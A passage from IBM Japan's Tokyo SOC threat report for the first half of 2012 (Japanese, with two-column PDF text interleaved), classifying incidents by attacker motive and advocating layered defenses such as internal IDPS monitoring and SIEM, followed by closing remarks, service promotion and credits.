勢の参加が重要であるため、簡易な攻撃ツールが用い 基づき、東京 SOC では国家スパイや産業スパイによ られる場合がほとんどです。この種のツールによる攻 る諜報活動と位置づけています。 撃は単純なので、公開サービスについて IDPS や WAF ほとんどの組織は国家レベルの諜報活動による直接 など一般的な防御手段を用意していれば、被害に遭う の攻撃とは無縁といえるでしょう。Stuxnet や Flame ことはほとんどありません。 のように対象を絞り込んで行われた高度な攻撃は話題 DDoS 攻撃に対抗するためには、正規のサービスと して提供する範囲(ノードあたりのアクセス数やその にこそなりますが、一般企業が実害を受けることはほ とんどありませんでした。 図 27 サイバー攻撃の目的別比較 29 2012 年上半期 Tokyo SOC 情報分析レポート 標的型攻撃対策と従来型攻撃対策のバランス しかし、近年いわゆる標的型攻撃の手法を用いて比 5.2 概況と対策 較的広範を対象に行われる攻撃が観測される傾向にあ ります。1 章 6 頁で取り上げた複数組織に送信される 標的型メール攻撃などが該当します。このような比較 的広範な組織を対象とした攻撃については、攻撃者の 素性や目的の推測が特に困難です。これまでの検知傾 向から、少なくとも攻撃作業を行っている作業者は、 当初は確たる目的を持っていない可能性があると考え ています。RAT などによって攻撃基盤を確保した後に、 侵入した組織の属性や攻撃基盤の規模、時勢などの状 況を踏まえて、目的を検討するような流れがあるので はないかと推測しています。 いずれにせよ、明確な目的が不明で、比較的多数の 組織を対象に攻撃が行われるため、政府機関や重要産 業に該当しない IT ユーザーも類似の攻撃の対象とな る可能性が考えられます。一般の組織がこの種の攻撃 に対して十全の対策を固めることは困難ですが、リス クを検討しておくことは重要です。 図 28 は、2012 年上半期に東京 SOC が識別したセ キュリティー・インシデントを前節の「金銭目的」 「示 威行動」「諜報活動」の視点で分類したものです。 注目すべきは 「諜報活動」 の比率が 0.4 パーセント、 「示威行動」に至っては 0 パーセントと、相対的に極 めて少数でしかないことです。このことは、SOC の提 供するサービスをご利用いただいているような、比較 的情報セキュリティーに予算を費やす組織であっても、 高度な標的型攻撃や突発的なハクティビズムではなく、 むしろ一般的なマルウェア感染や公開サーバーへの攻 撃など従来型のセキュリティー・インシデントの影響 を強く受けていることを示しています。 単純なマルウェア感染でさえ完全に防御することが 困難な現状を考えると、エンドポイントへのウイルス 対策ソフト導入や、ネットワーク境界への IPS 設置と いった、単一のソリューションに頼った攻撃対策は非 常に危険です。攻撃の遮断を至上命題とするのではな く、個々のソリューションが突破されることを前提に 多層防御を構成し、境界防御を突破して成功しつつあ る攻撃を検出して追跡、緩和することを視野に入れた 体制を構築することが重要です。 示威行動 0% 諜報活動 0.4% 金銭目的 99.6% 図 28 東京 SOC で識別、対処したセキュリティー・インシデントの分類 (東京 SOC 調べ:2012 年 1 月 1 日~2012 年 6 月 30 日) 30 2012 年上半期 Tokyo SOC 情報分析レポート 標的型攻撃対策と従来型攻撃対策のバランス また、 「諜報活動」に分類される標的型攻撃などへの 5.3 まとめ 対策を検討する際、実事案ベースで 1 パーセントに満 たない脅威について、高価な対策を行う余裕のある組 織はそれほど多くないでしょう。従来型の脅威も含め、 多層的な対策を効率よく実施することが求められます。 外部接続端末の分離や、Proxy ログのトレースとい うような高コストな対策が難しいときに、例えば、既 存 IDPS を活用して内部ネットワークの通信を監視す る23といった比較的安価な対策を検討することも考え られるかもしれません。 IDPS による内部通信の監視はあらゆる攻撃の検出 を可能にするものではありませんが、一般的に DMZ やサーバーセグメントの防御に用いられることの多い IDPS をこのような用途にも併用することで、従来型 の攻撃と標的型攻撃などの高度な攻撃双方に対して、 効率よく一定のセキュリティーレベルを確保する手段 として検討に値するのではないでしょうか。 前節では一例として IDPS の活用を取り上げました が、それが最良のソリューションというわけではあり ま せ ん 。 Next-Generation Firewall や Anti-Virus Gateway な ど 他 の 種 類 の ネ ッ ト ワ ー ク 機 器 や 、 Netflow から Proxy ログまで網羅的に処理する本格的 な SIEM 環境など、様々なツールのうち、導入費用や 運用負荷、検出精度などの観点から組織に最適な防御 態勢を構築することが望ましいでしょう。 標的型攻撃が脅威であることは間違いありませんが、 それは一般の企業組織が直面している脅威のごく一部 でしかありません。他の従来型の脅威とのバランスを 考慮して個々の組織における対策の優先順位を検討す ることが重要です。 23 IDPS による標的型攻撃対策について、詳しくは「2011 年下半 期 Tokyo SOC 情報分析レポート」の" 6 Advanced Persistent Threat(APT)への対策方針"をご参照ください。 http://www.ibm.com/services/jp/its/pdf/tokyo_soc_report2011_ h2.pdf 31 2012 年上半期 Tokyo SOC 情報分析レポート おわりに 諜報活動の一端かもしれない高度な標的型メール攻 撃から、巷にありふれた金銭目的のドライブ・バイ・ どのようなソリューションを用いるにせよ、防御側 の目的・目標を鮮明にしておくことが極めて重要です。 ダウンロード攻撃まで、攻撃者の意図や手法によらず、 多くの組織のネットワークが連日のようにマルウェア の侵入を許しているという現状があります。 IBM では、本レポートで紹介したような情報セキュ リティーに対する脅威によってもたらされるリスクを また、最近は SNS や個人利用のスマートフォン、各 低減するための対策を、現実的な方法で実現する必要 種クラウドサービスなどを介した攻撃の脅威の増加な があると考えています。そして、具体的なセキュリテ どが叫ばれていますが、これらも早晩現実のものとな ィー対策を検討支援、設計、導入から運用まで一貫し ると考えられます。業務利用する機会のある個人所有 て提供しています。 端末を含め、組織で利用するクライアント端末がマル マネージド・セキュリティー・サービスでは、ネッ ウェアに感染するリスクはさらに高まっていくでしょ トワーク・レイヤーにおけるセキュリティー対策の運 う。 用サイクルを効率的に進めるために、IDPS の運用サ しかし、組織の性質にもよりますが、組織内へのマ ービスである「IDPS Management」や、次世代ファ ルウェア侵入を根絶することは、多くの場合、コスト イアウォールや UTM デバイスの運用を行う「Unified 的な理由から現実的ではありません。マルウェア感染、 Threat Management」といったサービス・ラインナ ネットワーク侵入を前提としたセキュリティー体制を ップを揃え、各種のネットワーク・セキュリティー機 構築することが現実的な対策となります。 器に対応しています。 このような対策を考えるとき、問題となるのが「ど また、クラウドベースで安価に SIEM(Security こまでやるか」です。感染や侵入の兆候を検出する手 information and event management)環境を実現 段は多岐にわたり、際限が無いからです。 する「Security Event and Log Management」とい また、従来のように検知、遮断(駆除)して終わりで はなく、兆候の検出やその追跡を目的とするような対 策は、運用に要する負荷が大きくなりがちです。 どの程度の機器やサービスを導入し、どのレベルの 運用を行うのか、結局のところ、どのような資産をど う新しいサービスをローンチしました。 これらのサービスでは、 専門の技術者が 24 時間 365 日監視/運用/管理を行います。情報セキュリティー に関するリスクを軽減させるための手段として利用を ご検討いただければ幸いです。 のような攻撃者から守りたいのかによってそれは変わ IBM は、社会的な基盤へと成長した情報システムを ってきます。端末に保存された個人情報をねらう金銭 守るため、高度化・多様化を続ける脅威に対して常に 目的の攻撃と、特定部門の機密情報を奪取しようとす "Ahead of the Threat"を実現する製品とサービスを る洗練された諜報攻撃では、同じ技術を用いて対応す 提供することで情報社会の発展を支援していきたいと るにしても運用レベル(例えば検出頻度や対応体制な 考えています。 ど)が格段に異なります。 【注意】本レポートで紹介した対策は、利用環境によって他のシステムへ影響を及ぼす恐れがあります。また、攻撃は日々変化しており、 必要となる対策もそれに応じて変化するため、記載内容の対策が、将来にわたって効果があるとは限りません。対策を行う際には十分 注意の上、自己責任で行ってください。なお、IBM はこれらの対策の効果を保証するものではありません。 32 2012 年上半期 Tokyo SOC 情報分析レポート 執筆者 大森 健史(エグゼクティブ・サマリー) 梨和 久雄(5章、おわりに) 朝長 秀誠(1 章~4章、コラム 1、2) 窪田 豪史(コラム3) 2012 年8月 2 日 発行 日本アイ・ビー・エム株式会社 GTS 事業 ITS デリバリー マネージド・セキュリティー・サービス ©Copyright IBM Japan, Ltd. 2012 IBM、IBM ロゴ、ibm.com、Ahead of the Threat および Proventia は、世界の多くの国で登録さ れた International Business Machines Corporation の商標です。他の製品名およびサービス名等は、 それぞれ IBM または各社の商標である場合があります。現時点での IBM の商標リストについては、 www.ibm.com/legal/copytrade.shtml をご覧ください。 Adobe は、Adobe Systems Incorporated の米国およびその他の国における登録商標または商標で す。 Microsoft および Windows は Microsoft Corporation の米国およびその他の国における商標です。 Java およびすべての Java 関連の商標およびロゴは Oracle やその関連会社の米国およびその他の 国における商標または登録商標です。 ●このレポートの情報は 2012 年 7 月時点のものです。内容は事前の予告なしに変更する場合があ ります。 33 2012 年上半期 Tokyo SOC 情報分析レポート
© Copyright 2024 ExpyDoc